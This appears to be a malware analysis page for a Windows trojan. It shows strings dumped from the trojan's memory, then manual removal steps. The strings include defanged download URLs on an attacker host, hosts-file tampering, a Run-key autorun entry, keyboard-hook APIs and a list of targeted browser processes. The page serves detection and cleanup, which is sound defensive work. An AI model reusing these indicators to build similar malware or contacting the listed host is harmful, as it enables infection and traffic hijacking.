SetWindowsHookExA
1.0.0.0
windowswf
mscoree.dll
_ChangePassword
(*.*)
2bcd58.exe_2216:
`.rsrc
t$(SSh
~%UVW
u$SShe
Bv=kAv.SCv
user32.dll
kernel32.dll
Kernel32.dll
OLEACC.DLL
ws2_32.dll
TCPHeader
windowswf
hXXp://VVV.hqkjwy.com:88/hosts1.txt
%System%\drivers\etc\hosts
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
127.0.0.1 localhost
hXXp://VVV.hqkjwy.com:88/dk.txt
@SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
z>Windows 2000
@Windows XP
@Windows 2003
@Windows Vista
@Windows 7
@Windows 8
WinHttp.WinHttpRequest.5.1
HTTP/1.1
hXXp://
iexplore.exe
liebao.exe
maxthon.exe
360se.exe
2345Explorer.exe|2345EX~1.EXE
firefox.exe
hao123Juzi.exe
SogouExplorer.exe
QQBrowser.exe
opera.exe
TaoBrowser.exe
Chrome_OmniboxView
TangoWeb.exe
TheWorld.exe
UCBrowser.exe
baidubrowser.exe
360chrome.exe
TTraveler.exe
|liebao.exe|vary.exe|went.exe|miniie.exe|cpopmus32ex.exe|crowd.exe|slowt32ex.exe|
f1browser.exe
2345chrome.exe
chrome.exe
&7http
VBScript.RegExp
%d&&'
123456789
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
F%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
Broken pipe
Inappropriate I/O control operation
Operation not permitted
iphlpapi.dll
SHLWAPI.dll
MPR.dll
VERSION.dll
WSOCK32.dll
.PAVCException@@
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
.PAVCFileException@@
: %d]
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
.PAVCNotSupportedException@@
out.prn
(*.prn)|*.prn|
%d.%d
%d/%d
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
%d / %d
Bogus message code %d
libpng error: %s
libpng warning: %s
1.1.3
bad keyword
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
(%d-%d):
%ld%c
packet.dll
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP/1.0
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
;3 #>6.&
'2, / 0&7!4-)1#
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
zcÁ
C:\Windows\system32\2bcd58.exe
#include "l.chs\afxres.rc" // Standard components
GetCPInfo
WinExec
GetProcessHeap
RegCloseKey
RegOpenKeyExA
RegCreateKeyA
RegDeleteKeyA
RegCreateKeyExA
GetViewportExtEx
GetViewportOrgEx
ScaleViewportExtEx
SetViewportExtEx
OffsetViewportOrgEx
SetViewportOrgEx
ShellExecuteA
GetKeyState
SetWindowsHookExA
UnhookWindowsHookEx
GetKeyboardLayout
VkKeyScanExA
keybd_event
CreateDialogIndirectParamA
InternetCanonicalizeUrlA
InternetCrackUrlA
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
.text
`.rdata
@.data
.rsrc
UrlA3%
}.mKK;
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level="requireAdministrator" uiAccess="false"/> </requestedPrivileges> </security></trustInfo></assembly>PAD
KERNEL32.DLL
ADVAPI32.dll
COMCTL32.dll
comdlg32.dll
GDI32.dll
ole32.dll
OLEAUT32.dll
RASAPI32.dll
SHELL32.dll
USER32.dll
WININET.dll
WINMM.dll
WINSPOOL.DRV
WS2_32.dll
(*.*)
1.0.0.0
2bcd58.exe_2216_rwx_00401000_000EF000:
t$(SSh
~%UVW
u$SShe
Bv=kAv.SCv
user32.dll
kernel32.dll
Kernel32.dll
OLEACC.DLL
ws2_32.dll
TCPHeader
windowswf
hXXp://VVV.hqkjwy.com:88/hosts1.txt
%System%\drivers\etc\hosts
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
127.0.0.1 localhost
hXXp://VVV.hqkjwy.com:88/dk.txt
@SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
z>Windows 2000
@Windows XP
@Windows 2003
@Windows Vista
@Windows 7
@Windows 8
WinHttp.WinHttpRequest.5.1
HTTP/1.1
hXXp://
iexplore.exe
liebao.exe
maxthon.exe
360se.exe
2345Explorer.exe|2345EX~1.EXE
firefox.exe
hao123Juzi.exe
SogouExplorer.exe
QQBrowser.exe
opera.exe
TaoBrowser.exe
Chrome_OmniboxView
TangoWeb.exe
TheWorld.exe
UCBrowser.exe
baidubrowser.exe
360chrome.exe
TTraveler.exe
|liebao.exe|vary.exe|went.exe|miniie.exe|cpopmus32ex.exe|crowd.exe|slowt32ex.exe|
f1browser.exe
2345chrome.exe
chrome.exe
&7http
VBScript.RegExp
%d&&'
123456789
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
F%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
Broken pipe
Inappropriate I/O control operation
Operation not permitted
iphlpapi.dll
SHLWAPI.dll
MPR.dll
VERSION.dll
WSOCK32.dll
.PAVCException@@
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
.PAVCFileException@@
: %d]
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
.PAVCNotSupportedException@@
out.prn
(*.prn)|*.prn|
%d.%d
%d/%d
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
%d / %d
Bogus message code %d
libpng error: %s
libpng warning: %s
1.1.3
bad keyword
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
(%d-%d):
%ld%c
packet.dll
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP/1.0
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
;3 #>6.&
'2, / 0&7!4-)1#
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
zcÁ
C:\Windows\system32\2bcd58.exe
#include "l.chs\afxres.rc" // Standard components
GetCPInfo
WinExec
GetProcessHeap
RegCloseKey
RegOpenKeyExA
RegCreateKeyA
RegDeleteKeyA
RegCreateKeyExA
GetViewportExtEx
GetViewportOrgEx
ScaleViewportExtEx
SetViewportExtEx
OffsetViewportOrgEx
SetViewportOrgEx
ShellExecuteA
GetKeyState
SetWindowsHookExA
UnhookWindowsHookEx
GetKeyboardLayout
VkKeyScanExA
keybd_event
CreateDialogIndirectParamA
InternetCanonicalizeUrlA
InternetCrackUrlA
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
.text
`.rdata
@.data
.rsrc
(*.*)
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
29c2bf.exe:3248
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
C:\Windows\System32\2bcd58.exe (678 bytes)
C:\Windows\29c2bf.exe (506 bytes)
C:\Windows\Temp\1.sys.rar (1994 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\SafeWall[1].rar (2835 bytes)
C:\Windows\System32\drivers\etc\hosts (826 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"windowswf" = "C:\Windows\system32\2bcd58.exe"
- Restore the original content of the HOSTS file (%System%\drivers\etc\hosts):
127.0.0.1 localhost
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.